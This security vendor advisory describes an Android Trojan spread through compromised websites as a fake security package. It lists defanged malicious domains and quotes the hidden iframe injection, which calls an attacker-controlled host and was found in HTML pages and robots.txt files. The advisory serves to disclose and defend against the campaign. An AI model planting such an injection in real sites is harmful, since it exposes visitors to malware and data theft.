Website Injection-Campaign Used in Conjunction with an Android Trojan

Back in December of 2011, Symantec identified the first case of an Android threat that was used in conjunction with a website-injection campaign targeting sites in the Middle East. Android.Arspam was an Android Trojan that redirected users to sites where a Hacktivist message was being delivered.

Today another website-injection campaign has come to light involving Android; only this time, the campaign involves the distribution of a mobile threat. This is not a typical drive-by-download whereby the application is automatically installed through an exploit – but rather the user is prompted to install the application after download.

Originally reported by the owner of an infected site on a social-bookmarking website, multiple sites have now emerged with a URL-redirect injected into the HTML body of an infected page. Reminiscent of Android.Bgserv, a malicious version of a Google security patch discovered by Symantec last year, the Trojan is delivered as a fake security package. Devices that allow installation from ’Unknown Sources’ are most susceptible to this type of attack as the user has to manually accept the permissions and prompts that are requested prior to an installation.

The following domains have been identified so far based on our investigation:

  • [http://]androidbia.info
  • [http://]androidjea.info
  • [http://]gaoanalitics.info
  • [http://]androidonlinefix.info

The website injection is of the form:

<iframe style="visibility: hidden; display: none; display: none;"
src="[http://]gaoanalitics.info/?id=[CLSID]">;
</iframe>

This injection has been identified not only on HTML sites, but also in robots.txt files. Therefore, it could well be the case that all files on the compromised Web server will have this iframe appended to it.

The payload itself is not very complicated to understand. Not obfuscated; just a few simple proxy and socket routines that can be used by the author of the threat to route traffic from an infected device to an external source. The real concern of this threat lies not in its immediate functionality, but in what it is capable of doing on behalf of an external force. As called out in our latest version of the Symantec ISTR report, threats like these represent a change in strategies by malware developers, moving away from traditional “smash-and-grab” jobs, like premium-SMS scams, to more sophisticated issues like privacy concerns and the theft of sensitive content used in extortion rackets, click-jacking etc.

With Norton Safeweb technology, this attack is blocked before the application even starts its download; unlike some other mobile security suites that rely solely on detecting threats after the download or during installation. Symantec currently detects this threat as Android.Notcompatible.

With Bring Your Own Device (BYOD) adoption increasing astronomically; threats like these represent a change in the paradigm in mobile malware. Although the number of sites compromised so far is small in number, it opens up the possibility for large scale web-injection attacks in order to distribute malicious mobile applications.